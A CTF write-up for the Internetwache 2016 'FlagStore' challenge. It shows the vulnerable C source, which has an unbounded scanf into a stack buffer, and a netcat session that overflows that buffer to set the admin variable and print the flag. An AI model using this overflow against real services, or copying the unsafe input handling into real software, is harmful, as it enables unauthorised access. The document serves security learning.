English [Internetwache CTF 2016] [Exploit 70 – FlagStore] Write Up

Description

Internetwache CTF 2016 : FlagStore
Category: Exploit Points: 70 Solves: 211 Description:

Description: Here’s the ultimate flag store. Store and retrieve your flags whenever you want.

Attachment: exp70.zip

Service: 188.166.133.53:12157

Resolution

We are provided a source file containing this:

#include <stdio.h>
#include <string.h>
#include "flag.h"

void register_user(char *username, char *password);
int check_login(char *user, char *pass, char *username, char *password);


int main() {
	char username[500];
	int is_admin = 0;
	char password[500];
	int logged_in = 0;
	char flag[250];

	char user[500];
	char pw[500];
	setbuf(stdout, NULL);
	printf("Welcome to the FlagStore!\n");

	while (1) {
		printf("Choose an action:\n");
		printf("> %s: 1\n> %s: 2\n> %s: 3\n> %s: 4\n", "regiser", "login", "get_flag", "store_flag");
		int answer = 0;
		scanf("%d", &answer);

		switch(answer) {
			case 1:
				printf("Enter an username:");
				scanf("%s", username);
				printf("Enter a password:");
				scanf("%s", password);

				if(strcmp(username, "admin") == 0) {
					printf("Sorry, admin user already registered\n");
					break;
				}

				if(strlen(password) < 6) {
					printf("Sorry, password too short\n");
					break;
				}

				register_user(username, password);
				printf("User %s successfully registered. You can login now!\n", username);

				break;
			case 2:
				printf("Username:");
				scanf("%499s", user);
				printf("Password:");
				scanf("%499s", pw);

				if(check_login(user, pw, username, password) == -1) {
					printf("Wrong credentials!\n");
					break;
				}

				logged_in = 1;
				printf("You're now authenticated!\n");

				break;
			case 3:
				if(logged_in == 0) {
					printf("Please login first!\n");
					break;
				}

				if(is_admin != 0) {
					strcpy(flag, FLAG);
				}

				printf("Your flag: %s\n", flag);

				break;
			case 4:
				if(logged_in == 0) {
					printf("Please login first!\n");
					break;
				}

				printf("Enter your flag:");
				scanf("%s",flag);

				printf("Flag saved!\n");

				break;
			default:
				printf("Wrong option\nGood bye\n");
				return -1;
		}
	}
}

void register_user(char *username, char *password) {
	//XXX: Implement database connection
	return;
}

int check_login(char *user, char *pass, char *username, char *password) {
	if (strcmp(user, username) != 0 || strcmp(pass, password) != 0) {
		return -1;
	}
	return 0;
}

To read the flag, we need to be admin and authed. We see that we can overflow the flag variable cause there is no control on the size of the input, so we basically create an user, login with that user, overflow with a long value that will put all variable to something > 0 and then we ask to get the flag:

laxa:FlagStore:13:14:38$ nc 188.166.133.53 12157
Welcome to the FlagStore!
Choose an action:
> regiser: 1
> login: 2
> get_flag: 3
> store_flag: 4
1
Enter an username:laxa
Enter a password:laxa
Sorry, password too short
Choose an action:
> regiser: 1
> login: 2
> get_flag: 3
> store_flag: 4
1
Enter an username:laxa
Enter a password:laxalaxa
User laxa successfully registered. You can login now!
Choose an action:
> regiser: 1
> login: 2
> get_flag: 3
> store_flag: 4
2
Username:laxa
Password:laxalaxa
You're now authenticated!
Choose an action:
> regiser: 1
> login: 2
> get_flag: 3
> store_flag: 4
4
Enter your flag:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Flag saved!
Choose an action:
> regiser: 1
> login: 2
> get_flag: 3
> store_flag: 4
3
Your flag: IW{Y_U_NO_HAZ_FLAG}

Flag is: IW{Y_U_NO_HAZ_FLAG}

Leave a Reply

Your email address will not be published.